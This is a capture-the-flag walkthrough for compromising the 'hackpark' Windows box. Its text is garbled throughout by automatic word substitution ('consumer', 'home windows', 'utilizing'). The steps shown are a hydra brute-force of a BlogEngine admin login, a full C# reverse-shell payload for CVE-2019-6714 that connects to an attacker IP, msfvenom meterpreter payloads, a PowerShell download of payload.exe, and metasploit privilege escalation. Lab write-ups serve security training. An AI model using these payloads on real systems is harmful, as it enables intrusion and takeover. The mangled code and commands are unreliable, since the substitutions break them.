CHALLENGE OVERVIEW
- Hyperlink: hackpark
- Issue: Medium
- Goal:
consumer
androot
flags on a home windows machine - Spotlight: utilizing
metasploit
to shortly and simply acquire root entry - Instruments:
nmap
,dirb
,hydra
,burpsuite
,msfvenom
- Tags: RCE (distant code execution), Home windows
BACKGROUND
On this field, we’ll hack right into a home windows machine utilizing normal pen-testing instruments. There are two choices for fixing the field.
I’ll reveal on this submit how one can hack into the field with metasploit
. Within the upcoming Hackpark Half II submit, I’ll present how one can discover the flags with out utilizing metasploit
.
ATTACK MAP
IPs
First, let’s document our IP addresses in export format to make use of as bash variables.
export myIP=10.6.2.23 export targetIP=10.10.72.99
ENUMERATION
We’ll kick issues off with a dirb
scan and an nmap
scan.
/admin is found on targetIP with dirb. ┌─[kalisurfer@parrot]─[~] └──╼ $nmap 10.10.208.243 Beginning Nmap 7.92 ( https://nmap.org ) at 2023-01-08 16:03 EST Nmap scan report for 10.10.208.243 Host is up (0.098s latency). Not proven: 998 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 3389/tcp open ms-wbt-server
The ms-wbt-server
appears to be like fascinating. A fast google search reveals that this port is used for home windows distant desktop. We could come again to this afterward within the hack.
PREPPING OUR COMMAND FOR HYDRA
Subsequent, we’ll use firefox in developer mode to examine the POST request once we try to login to the /admin
portal with generic credentials (admin:cross
).
__VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0percent2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6percent2BrSLbrLQTpGUW7PNN9yu81percent2BCrpercent2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrwpercent2FHcpercent2FbHRLj78Vg3uIgS1tBETE8yApercent2FyhVkcxlv4S57ylx&__EVENTVALIDATION=KzdpR5igpercent2BeM9w8w06SCMiInTpqbnYjXVGpercent2BDsvem6bDWpercent2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8Upercent2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Qpercent2F0ofNG0percent2FXAWpg3L4ag2Jpercent2FxFs&ctl00percent24MainContentpercent24LoginUserpercent24UserName=consumer&ctl00percent24MainContentpercent24LoginUserpercent24Password=cross&ctl00percent24MainContentpercent24LoginUserpercent24LoginButton=Log+in__VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0percent2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6percent2BrSLbrLQTpGUW7PNN9yu81percent2BCrpercent2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrwpercent2FHcpercent2FbHRLj78Vg3uIgS1tBETE8yApercent2FyhVkcxlv4S57ylx&__EVENTVALIDATION=KzdpR5igpercent2BeM9w8w06SCMiInTpqbnYjXVGpercent2BDsvem6bDWpercent2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8Upercent2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Qpercent2F0ofNG0percent2FXAWpg3L4ag2Jpercent2FxFs&ctl00percent24MainContentpercent24LoginUserpercent24UserName=consumer&ctl00percent24MainContentpercent24LoginUserpercent24Password=cross&ctl00percent24MainContentpercent24LoginUserpercent24LoginButton=Log+in
Subsequent, we’ll put together our command for hydra to make use of to brute-force our manner into the admin portal.
hydra -l admin -P /residence/kalisurfer/hacking-tools/rockyou.txt 10.10.72.99 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdSpercent2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZepercent2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0percent2BrszOq1MNzhtok7qDPJpercent2FZf5IAVBDpercent2Fmt6iBA4TSBv7cqegTpercent2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4dpercent2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6btpercent2BqH02JOxtv6pPXlY&__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZpercent2Fpercent2FA5fVpnOdEG3r6M5vBCXiCPZMX9Zpercent2Fpercent2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&ctl00percent24MainContentpercent24LoginUserpercent24UserName=admin&ctl00percent24MainContentpercent24LoginUserpercent24Password=^PASS^&ctl00percent24MainContentpercent24LoginUserpercent24LoginButton=Log+in:Login failed"
-l
is for username-P
is for password wordlisthttp-post-form
specifies the kind of TCP request:Login
failed (on the finish of the command) specifies the message response after a failed login try
Outcomes:
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please don't use in navy or secret service organizations, or for unlawful functions (that is non-binding, these *** ignore legal guidelines and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) beginning at 2023-01-08 18:02:09 [DATA] max 16 duties per 1 server, total 16 duties, 14344398 login tries (l:1/p:14344398), ~896525 tries per process [DATA] attacking http-post-form://10.10.208.243:80/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdSpercent2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZepercent2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0percent2BrszOq1MNzhtok7qDPJpercent2FZf5IAVBDpercent2Fmt6iBA4TSBv7cqegTpercent2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4dpercent2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6btpercent2BqH02JOxtv6pPXlY&__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZpercent2Fpercent2FA5fVpnOdEG3r6M5vBCXiCPZMX9Zpercent2Fpercent2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&ctl00percent24MainContentpercent24LoginUserpercent24UserName=admin&ctl00percent24MainContentpercent24LoginUserpercent24Password=^PASS^&ctl00percent24MainContentpercent24LoginUserpercent24LoginButton=Log+in:Login failed [STATUS] 663.00 tries/min, 663 tries in 00:01h, 14343735 to do in 360:35h, 16 energetic [80][http-post-form] host: 10.10.208.243 login: admin password: 1qaz2wsx 1 of 1 goal efficiently accomplished, 1 legitimate password discovered Hydra (https://github.com/vanhauser-thc/thc-hydra) completed at 2023-01-08 18:03:43
INITIAL FOOTHOLD
Now we are able to log in with the consumer:password
combo admin:1qaz2wsx
We’re proven an admin dashboard. Looking out up blogengine
in exploits-db.com reveals a attainable exploit for us to make use of: (CVE-2019-6714).
To make use of the exploit, we have to add the exploit’s payload (PostView.ascx
) via the file supervisor. We will then set off it by accessing the next deal with in our browser:
http://10.10.172.59/?theme=../../App_Data/information
And we should always then be capable to catch the revshell with a netcat
listener.
PREPARE THE PAYLOAD
We have to change the IP and ports (in daring under) within the following payload, after which reserve it as PostView.ascx
payload: <%@ Management Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Net.Controls.PostViewBase" %> <%@ Import Namespace="BlogEngine.Core" %> <script runat="server"> static System.IO.StreamWriter streamWriter; protected override void OnLoad(EventArgs e) { base.OnLoad(e); utilizing(System.Web.Sockets.TcpClient consumer = new System.Web.Sockets.TcpClient("10.6.2.23", 8888)) { utilizing(System.IO.Stream stream = consumer.GetStream()) { utilizing(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) { streamWriter = new System.IO.StreamWriter(stream); StringBuilder strInput = new StringBuilder(); System.Diagnostics.Course of p = new System.Diagnostics.Course of(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler); p.Begin(); p.BeginOutputReadLine(); whereas(true) { strInput.Append(rdr.ReadLine()); p.StandardInput.WriteLine(strInput); strInput.Take away(0, strInput.Size); } } } } } non-public static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) { StringBuilder strOutput = new StringBuilder(); if (!String.IsNullOrEmpty(outLine.Knowledge)) { attempt { strOutput.Append(outLine.Knowledge); streamWriter.WriteLine(strOutput); streamWriter.Flush(); } catch (Exception err) { } } } </script> <asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
SET UP THE NC LISTENER
Subsequent, let’s spin up a netcat
listener with the command:
nc -lnvp 8888
TRIGGER THE REV SHELL
Now that our malicious payload is uploaded and our netcat
listener is activated, all we now have to do is navigate to the next deal with, and we should always catch the reverse shell as deliberate.
http://10.10.172.59/?theme=../../App_Data/information
And … bingo! We’ve caught the revshell and we’re in with our preliminary foothold!
UPGRADE THE SHELL TO METERPRETER
Now that we’re within the shell, we are able to work to improve our shell to a meterpreter shell. This may permit us to make use of many highly effective instruments inside metasploit framework.
We’ll use python3
to spin up a easy HTTP server that may assist us serve the reverse meterpreter shell payload file to the home windows machine.
USE MSFVENOM TO CREATE REVSHELL PAYLOAD
The next command will create the payload:
msfvenom -p home windows/meterpreter/reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f exe -o payload.exe
The payload didn’t work on my machine, so I added encoding utilizing an ordinary encoder, the “shikata gai nai”.
msfvenom -p home windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o payload.exe
TRANSFER THE MSFVENOM PAYLOAD TO TARGET
Subsequent, we’ll switch the encoded payload from our assault machine to the goal machine.
Let’s navigate to the listing that holds the payload.exe
on our assault machine. Then we’ll spin up a easy HTTP server utilizing the command:
Python3 -m http.server
Then we’ll seize the file and replica it to our goal Home windows machine from the HTTP server:
powershell -c "Invoke-WebRequest -Uri 'http://10.6.2.23:8000/payload.exe' -OutFile 'C:WindowsTempwinPEASx64.exe'"
Discover that we save the file within the Temp
listing as a result of we now have to write down permissions there. This can be a widespread configuration that may be leveraged as an unprivileged consumer.
CATCH THE METERPRETER SHELL WITH METASPLOIT
First, let’s fireplace up Metasploit console:
msfconsole
Then load the handler:
use exploit/multi/handler
Subsequent, we have to set the lport
, lhost
, and set the payload to home windows/meterpreter/reverse_tcp
Now that the whole lot is about up accurately, we are able to run it besides up the meterpreter listener:
Run
activate the shell.exe
on the goal machine to throw a meterpreter revshell
And we received it! The decrease left console window reveals the meterpreter shell.
Now that we’re working a meterpreter shell in msfconsole
we are able to shortly pwn the system with:
getsystem
And think about the system data:
sysinfo
We will view our consumer data with the command:
getuid
Since we’re already NT Authority, due to the magical powers of Metasploit, we don’t have to do the rest besides find and retrieve the 2 flags.
We discovered each flags!
Within the subsequent submit, I’ll stroll you thru an alternate answer to this field while not having Metasploit.